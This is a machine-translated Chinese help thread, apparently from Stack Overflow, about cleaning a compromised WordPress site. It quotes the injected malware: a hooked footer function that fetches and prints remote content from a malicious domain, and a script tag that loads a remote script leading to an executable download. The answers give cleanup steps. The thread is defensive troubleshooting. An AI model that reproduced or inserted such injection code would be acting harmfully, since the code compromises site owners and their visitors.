此脚本不断返回到我在 public_html 文件夹中的 wp-load.php 文件:
函数 pluginAuth(){ 回声(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js'))); } add_action('wp_footer', 'pluginAuth');
这指向一个病毒站点“jquerys.net”
有什么解决办法。从 wp-load.php 中删除功能并不能消除它,因为它会在刷新我博客的任何页面时重新生成。
请帮忙
【问题讨论】:
可能有恶意代码注入到您的任何 wordpress 文件中。您将需要检查所有文件,尤其是主题内的文件,以查找不应该存在的代码或文件/文件夹。
在此之后,您可以使用本文使您的构建更加安全:
过去对我来说非常有用,可以防止此类事情再次发生。您可以根据需要采取尽可能多或尽可能少的安全措施。
我绝对会建议从保护 wp-admin 部分做所有事情。
【讨论】:
很可能您在wp-ulpoads 文件夹中有一些受感染或恶意文件,还要检查那里的任何文件类型,而不是图像或文档。
同样重要:检查你当前的主题functions.php文件是否有恶意代码,经常被黑的主题(即通过mafiashare网站的bittorent网站下载)注入此类代码,搜索任何curl()请求,实际上不仅在functions.php ,但在文件中(如果您的主题有)options.php 或 settings.php 等。
【讨论】:
您似乎安装了受感染的 WordPress。使用 Theme Authenticity Checker 或 Exploit Scanner 插件自动检测可能是罪魁祸首的潜在恶意文件。
你也可以试试Sucuri的免费扫描服务。
一旦您完成了损坏文件的识别,请将它们替换为您可以从WordPress.org 获得的官方对应文件。
作为防御措施,安装WordPress File Monitor Plus 插件 - 因为它会在每次更改某些文件时发送电子邮件。这将允许您快速恢复某些黑客/脚本在未来所做的任何更改!
【讨论】:
我能够检测到恶意脚本。它在 public_html 文件夹中。该文件是“main.php”,它不在默认安装中,也对任何主题或插件没有贡献。删除所有未验证的插件后,我删除了这个文件并删除了 wp-load.php 中的代码。
起初我没有删除“main.php”文件。 wp-load 中的“功能”不断返回。但是在删除“main.php”文件后,我已经摆脱了这个病毒。
【讨论】:
WP中有新病毒
有一个由line
<script src="//socialstatsplugin.com/jqury.js"></script>发起的update.exe下载
我对这种病毒做了一些评论。
只需转到您的 WP 文件夹并检查是否有任何不需要的隐藏文件,当您浏览该文件时,这些文件是不可读的。
正如所说的那样做
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
并删除任何文件夹中所有不需要的隐藏文件夹。它工作到现在。希望它会有所帮助。永远不知道未来。
谢谢
【讨论】: